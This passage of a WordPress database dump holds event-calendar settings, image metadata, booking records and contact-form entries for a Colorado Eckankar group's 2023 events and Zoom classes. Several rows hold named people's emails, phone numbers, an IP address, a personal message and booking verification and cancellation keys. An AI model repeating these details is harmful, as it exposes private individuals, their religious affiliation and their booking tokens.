}'),(190063,268912,'mec_ticket_variations_global_inheritance','1'),(190064,268912,'mec_ticket_variations','a:0:{}'),(190065,268912,'mec_reg_fields_global_inheritance','1'),(190066,268912,'mec_reg_fields','a:0:{}'),(190067,268912,'mec_bfixed_fields','a:0:{}'),(190068,268912,'mec_op','a:0:{}'),(190069,268912,'mec_fields','a:0:{}'),(190070,268912,'mec_event_status','EventScheduled'),(190071,268912,'mec_moved_online_link',''),(190072,268912,'mec_cancelled_reason',''),(190073,268912,'mec_display_cancellation_reason_in_single_page',''),(190074,268912,'boldgrid_hide_page_title','0'),(190075,268912,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(190076,268912,'passster_activate_global_protection',''),(190077,268912,'passster_activate_protection',''),(190078,268912,'passster_protection_type','password'),(190079,268912,'boldgrid_in_page_containers','1'),(190080,268912,'_dp_original','265240'),(190081,268912,'_edit_lock','1692153445:15'),(190082,268912,'passster_area_shortcode',''),(190083,268912,'_edit_last','15'),(190084,268912,'_wp_old_date','2023-01-14'),(190085,268912,'mec_cost_auto_calculate','0'),(190086,268912,'mec_style_per_event','global'),(190087,268912,'mec_trailer_url',''),(190088,268912,'mec_trailer_title',''),(190089,268912,'mec_start_datetime','2023-09-09 10:00 AM'),(190090,268912,'mec_end_datetime','2023-09-10 05:00 PM'),(190091,268912,'mec_sequence','8'),(190092,268912,'mec_event_gallery','a:0:{}'),(190093,268912,'mec_related_events','a:0:{}'),(190094,268912,'mec_banner','a:0:{}'),(190095,268913,'_wp_attached_file','2023/08/WholeExpo.webp'),(190096,268913,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:22:\"2023/08/WholeExpo.webp\";s:8:\"filesize\";i:16518;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"WholeExpo-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7678;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"WholeExpo-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3314;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"WholeExpo-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5930;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:22:\"WholeExpo-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11264;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"WholeExpo-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9946;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"WholeExpo-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8190;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"WholeExpo-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6512;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(190097,268912,'_thumbnail_id','268913'),(190098,268914,'protect_children',''),(190099,268914,'mec_color',''),(190100,268914,'mec_location_id','131'),(190101,268914,'mec_dont_show_map','0'),(190102,268914,'mec_organizer_id','1'),(190103,268914,'mec_read_more',''),(190104,268914,'mec_more_info',''),(190105,268914,'mec_more_info_title',''),(190106,268914,'mec_more_info_target','_self'),(190107,268914,'mec_cost',''),(190108,268914,'mec_currency','a:0:{}'),(190109,268914,'mec_additional_organizer_ids','a:0:{}'),(190110,268914,'mec_additional_location_ids','a:0:{}'),(190111,268914,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-17\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-17\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(190112,268914,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(190113,268914,'mec_certain_weekdays','a:0:{}'),(190114,268914,'mec_allday','0'),(190115,268914,'one_occurrence','0'),(190116,268914,'mec_hide_time','0'),(190117,268914,'mec_hide_end_time','0'),(190118,268914,'mec_comment',''),(190119,268914,'mec_timezone','global'),(190120,268914,'mec_countdown_method','global'),(190121,268914,'mec_public','1'),(190122,268914,'mec_start_date','2023-09-17'),(190123,268914,'mec_start_time_hour','1'),(190124,268914,'mec_start_time_minutes','0'),(190125,268914,'mec_start_time_ampm','PM'),(190126,268914,'mec_start_day_seconds','46800'),(190127,268914,'mec_end_date','2023-09-17'),(190128,268914,'mec_end_time_hour','2'),(190129,268914,'mec_end_time_minutes','30'),(190130,268914,'mec_end_time_ampm','PM'),(190131,268914,'mec_end_day_seconds','52200'),(190132,268914,'mec_repeat_status','0'),(190133,268914,'mec_repeat_type',''),(190134,268914,'mec_repeat_interval','1'),(190135,268914,'mec_repeat_end',''),(190136,268914,'mec_repeat_end_at_occurrences',''),(190137,268914,'mec_repeat_end_at_date',''),(190138,268914,'mec_advanced_days','a:0:{}'),(190139,268914,'mec_in_days',''),(190140,268914,'mec_not_in_days',''),(190141,268914,'mec_hourly_schedules','a:0:{}'),(190142,268914,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(190143,268914,'mec_tickets','a:0:{}'),(190144,268914,'mec_fees_global_inheritance','1'),(190145,268914,'mec_fees','a:0:{}'),(190146,268914,'mec_ticket_variations_global_inheritance','1'),(190147,268914,'mec_ticket_variations','a:0:{}'),(190148,268914,'mec_reg_fields_global_inheritance','1'),(190149,268914,'mec_reg_fields','a:0:{}'),(190150,268914,'mec_bfixed_fields','a:0:{}'),(190151,268914,'mec_op','a:0:{}'),(190152,268914,'mec_fields','a:0:{}'),(190153,268914,'mec_event_status','EventScheduled'),(190154,268914,'mec_moved_online_link',''),(190155,268914,'mec_cancelled_reason',''),(190156,268914,'mec_display_cancellation_reason_in_single_page',''),(190157,268914,'boldgrid_hide_page_title','0'),(190158,268914,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(190159,268914,'passster_activate_global_protection',''),(190160,268914,'passster_activate_protection',''),(190161,268914,'passster_protection_type','password'),(190162,268914,'boldgrid_in_page_containers','1'),(190163,268914,'passster_area_shortcode',''),(190164,268914,'_wp_old_date','2023-01-14'),(190165,268914,'mec_cost_auto_calculate','0'),(190166,268914,'mec_style_per_event','global'),(190167,268914,'mec_trailer_url',''),(190168,268914,'mec_trailer_title',''),(190169,268914,'mec_start_datetime','2023-09-17 01:00 PM'),(190170,268914,'mec_end_datetime','2023-09-17 02:30 PM'),(190171,268914,'mec_sequence','8'),(190172,268914,'mec_event_gallery','a:0:{}'),(190173,268914,'mec_related_events','a:0:{}'),(190174,268914,'mec_banner','a:0:{}'),(190175,268914,'_thumbnail_id','268915'),(190176,268914,'_dp_original','268765'),(190177,268914,'_edit_lock','1692154293:15'),(190178,268914,'_edit_last','15'),(190179,268915,'_wp_attached_file','2023/08/GoldenLightPerson.webp'),(190180,268915,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:30:\"2023/08/GoldenLightPerson.webp\";s:8:\"filesize\";i:20176;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"GoldenLightPerson-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6894;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"GoldenLightPerson-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3170;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:30:\"GoldenLightPerson-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7654;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:30:\"GoldenLightPerson-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14252;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:30:\"GoldenLightPerson-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12248;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:30:\"GoldenLightPerson-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9312;}s:8:\"tileview\";a:5:{s:4:\"file\";s:30:\"GoldenLightPerson-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8548;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(193856,269224,'_field_649',''),(193857,269224,'_form_id','61'),(190184,71622,'passster_area_shortcode',''),(190185,71767,'passster_area_shortcode',''),(190186,33457,'passster_area_shortcode',''),(190187,268930,'_field_179','Agnes'),(190188,268930,'_field_180','Hynes'),(190189,268930,'_field_181','amhynes7@msn.com'),(190190,268930,'_field_182','CO'),(190191,268930,'_field_183','US'),(190192,268930,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(190193,268930,'_form_id','17'),(190194,268930,'_seq_num','22'),(190196,268931,'_field_225','Kristjanson'),(190197,268931,'_field_226','johnkfreedom22@protonmail.com'),(190198,268931,'_field_227','CO'),(190199,268931,'_field_228','US'),(190200,268931,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(190201,268931,'_form_id','21'),(190202,268931,'_seq_num','184'),(190203,268932,'_field_133','mike'),(190204,268932,'_field_134','boone'),(190205,268932,'_field_135','knotafarm@hotmail.com'),(190206,268932,'_field_137','Art prints'),(190207,268932,'_field_138','Greetings,  I am a ECKist living in leadville and sent a package to Eckankar in Colorado containing print of two Eck masters.  Do with it as you like!'),(190208,268932,'_form_id','13'),(190209,268932,'_seq_num','144'),(193389,269176,'mec_other_dates','a:0:{}'),(193388,269176,'mec_all_dates','a:0:{}'),(193387,269176,'mec_booking_time','2023-10-08 09:47:27'),(193386,269176,'mec_ticket_id',',1,'),(193385,269176,'mec_date','1696761000:1696764600'),(193384,269176,'mec_event_id','269109'),(193383,269176,'mec_confirmed','1'),(193376,269176,'mec_transaction_id','TFL56477'),(193377,269176,'mec_gateway','MEC_gateway_free'),(193378,269176,'mec_gateway_label','Free'),(193379,269176,'mec_user_id','1000061'),(193380,269176,'mec_verified','1'),(193381,269176,'mec_verification_key','f668dc9b770e431d526d6ef303cc9e5e'),(193382,269176,'mec_cancellation_key','586f8fef144a9681e7805d47727cebda'),(193373,269175,'mec_price','0'),(193374,269175,'mec_payable','0'),(193375,269175,'mec_local_timezone','America/Chicago'),(193372,269175,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:19:\"Bonnie Greenstreet \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"172.59.96.30\";}}'),(193371,269175,'mec_ticket_price_1','0'),(193370,269175,'mec_booking_location','129'),(193369,269175,'mec_book_date_submit','20231008075533'),(193368,269175,'mec_attention_time_end','1696764600'),(193367,269175,'mec_attention_time_start','1696761000'),(193366,269175,'mec_attention_time','1696761000:1696764600'),(193365,269175,'mec_other_dates','a:0:{}'),(193364,269175,'mec_all_dates','a:0:{}'),(193363,269175,'mec_booking_time','2023-10-08 07:55:33'),(193362,269175,'mec_ticket_id',',1,'),(193361,269175,'mec_date','1696761000:1696764600'),(193348,269174,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom'),(193349,269174,'_field_649','Hi.  Can you share your name, because I wondering if I have met you before.  We are still Colorado newbies - here for one year now, and I\'m curious.  Thanks!  In ECK,  Lisa'),(193350,269174,'_form_id','61'),(193351,269174,'_seq_num','42'),(193352,269175,'mec_transaction_id','PHR94097'),(193353,269175,'mec_gateway','MEC_gateway_free'),(193354,269175,'mec_gateway_label','Free'),(193355,269175,'mec_user_id','1000023'),(193356,269175,'mec_verified','1'),(193357,269175,'mec_verification_key','ec5c26087ceff259d9b41761b1d7e4d7'),(193358,269175,'mec_cancellation_key','9ac11eb083a41ab65e85e879cd399a50'),(193359,269175,'mec_confirmed','1'),(193360,269175,'mec_event_id','269109'),(193347,269174,'_field_651','(215) 266-8426'),(193346,269174,'_field_653','Lisa1lg3@gmail.com'),(193345,269174,'_field_652','Gage'),(193344,269174,'_field_654','Lisa'),(193343,269173,'_seq_num','41'),(193342,269173,'_form_id','61'),(193341,269173,'_field_649',''),(193340,269173,'_field_656','The ECK Dream 1 Discourses - STARTS IN NOVEMBER -- 1st Thursday at 700 pm - Zoom'),(193339,269173,'_field_651','(435) 632-7454'),(193338,269173,'_field_653','engel.thomasj@gmail.com'),(193337,269173,'_field_652','Engel'),(193325,269171,'_field_649',''),(193326,269171,'_form_id','61'),(193327,269171,'_seq_num','39'),(193328,269172,'_field_654','Janice'),(193329,269172,'_field_652','Burke'),(193330,269172,'_field_653','janbur1@comcast.net'),(193331,269172,'_field_651','(303) 601-0534'),(193332,269172,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom'),(193333,269172,'_field_649',''),(193334,269172,'_form_id','61'),(193335,269172,'_seq_num','40'),(193336,269173,'_field_654','Thomas'),(193324,269171,'_field_656','The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom'),(193323,269171,'_field_651','(720) 474-5008'),(193322,269171,'_field_653','HannahMLarson@gmail.com'),(193321,269171,'_field_652','Larson'),(193320,269171,'_field_654','Hannah'),(193319,269170,'_seq_num','38'),(193318,269170,'_form_id','61'),(193317,269170,'_field_649',''),(193316,269170,'_field_656','The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 700 pm - Zoom -  Zoom'),(193315,269170,'_field_651','(303) 434-2448'),(193314,269170,'_field_653','amhynes7@msn.com'),(193313,269170,'_field_652','Hynes'),(193312,269170,'_field_654','Agnes'),(190291,268934,'protect_children',''),(190292,268934,'mec_color',''),(190293,268934,'mec_location_id','118'),(190294,268934,'mec_dont_show_map','0'),(190295,268934,'mec_organizer_id','1'),(190296,268934,'mec_read_more',''),(190297,268934,'mec_more_info',''),(190298,268934,'mec_more_info_title',''),(190299,268934,'mec_more_info_target','_self'),(190300,268934,'mec_cost',''),(190301,268934,'mec_currency','a:0:{}'),(190302,268934,'mec_additional_organizer_ids','a:0:{}'),(190303,268934,'mec_additional_location_ids','a:0:{}'),(190304,268934,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-06\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-06\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(190305,268934,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(190306,268934,'mec_certain_weekdays','a:0:{}'),(190307,268934,'mec_allday','0'),(190308,268934,'one_occurrence','0'),(190309,268934,'mec_hide_time','0'),(190310,268934,'mec_hide_end_time','0'),(190311,268934,'mec_comment',''),(190312,268934,'mec_timezone','global'),(190313,268934,'mec_countdown_method','global'),(190314,268934,'mec_public','1'),(190315,268934,'mec_start_date','2023-09-06'),(190316,268934,'mec_start_time_hour','7'),(190317,268934,'mec_start_time_minutes','0'),(190318,268934,'mec_start_time_ampm','PM'),(190319,268934,'mec_start_day_seconds','68400'),(190320,268934,'mec_end_date','2023-09-06'),(190321,268934,'mec_end_time_hour','8'),(190322,268934,'mec_end_time_minutes','0'),(190323,268934,'mec_end_time_ampm','PM'),(190324,268934,'mec_end_day_seconds','72000'),(190325,268934,'mec_repeat_status','0'),(190326,268934,'mec_repeat_type',''),(190327,268934,'mec_repeat_interval','1'),(190328,268934,'mec_repeat_end',''),(190329,268934,'mec_repeat_end_at_occurrences',''),(190330,268934,'mec_repeat_end_at_date',''),(190331,268934,'mec_advanced_days','a:0:{}'),(190332,268934,'mec_in_days',''),(190333,268934,'mec_not_in_days',''),(190334,268934,'mec_hourly_schedules','a:0:{}'),(190335,268934,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(190336,268934,'mec_tickets','a:0:{}'),(190337,268934,'mec_fees_global_inheritance','1'),(190338,268934,'mec_fees','a:0:{}'),(190339,268934,'mec_ticket_variations_global_inheritance','1'),(190340,268934,'mec_ticket_variations','a:0:{}'),(190341,268934,'mec_reg_fields_global_inheritance','1'),(190342,268934,'mec_reg_fields','a:0:{}'),(190343,268934,'mec_bfixed_fields','a:0:{}'),(190344,268934,'mec_op','a:0:{}'),(190345,268934,'mec_fields','a:0:{}'),(190346,268934,'mec_event_status','EventScheduled'),(190347,268934,'mec_moved_online_link',''),(190348,268934,'mec_cancelled_reason',''),(190349,268934,'mec_display_cancellation_reason_in_single_page',''),(190350,268934,'boldgrid_hide_page_title','0'),(190351,268934,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(190352,268934,'passster_activate_global_protection',''),(190353,268934,'passster_activate_protection',''),(190354,268934,'passster_protection_type','password'),(190355,268934,'boldgrid_in_page_containers','1'),(190356,268934,'passster_area_shortcode',''),(190357,268934,'_wp_old_date','2023-01-14'),(190358,268934,'mec_cost_auto_calculate','0'),(190359,268934,'mec_style_per_event','global'),(190360,268934,'mec_trailer_url',''),(190361,268934,'mec_trailer_title',''),(190362,268934,'mec_start_datetime','2023-09-06 07:00 PM'),(190363,268934,'mec_end_datetime','2023-09-06 08:00 PM'),(190364,268934,'mec_sequence','13'),(190365,268934,'mec_event_gallery','a:0:{}'),(190366,268934,'mec_related_events','a:0:{}'),(190367,268934,'mec_banner','a:0:{}'),(190368,268934,'_thumbnail_id','266179'),(190369,268934,'_dp_original','268765'),(190370,268934,'_edit_lock','1693071582:15'),(190371,268934,'_edit_last','15'),(192379,269127,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom'),(190372,268936,'_wp_attached_file','2023/06/GoldenSunset.webp'),(190373,268936,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:25:\"2023/06/GoldenSunset.webp\";s:8:\"filesize\";i:29812;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"GoldenSunset-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8708;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"GoldenSunset-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3520;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"GoldenSunset-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9500;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:25:\"GoldenSunset-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19334;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"GoldenSunset-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15318;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"GoldenSunset-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11658;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"GoldenSunset-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11636;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(190374,268940,'mec_color',''),(190375,268940,'mec_location_id','118'),(190376,268940,'mec_dont_show_map','0'),(190377,268940,'mec_organizer_id','1'),(190378,268940,'mec_read_more',''),(190379,268940,'mec_more_info',''),(190380,268940,'mec_more_info_title',''),(190381,268940,'mec_more_info_target','_self'),(190382,268940,'mec_cost',''),(190383,268940,'mec_currency','a:0:{}'),(190384,268940,'mec_additional_organizer_ids','a:0:{}'),(190385,268940,'mec_additional_location_ids','a:0:{}'),(190386,268940,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-03\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-03\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s: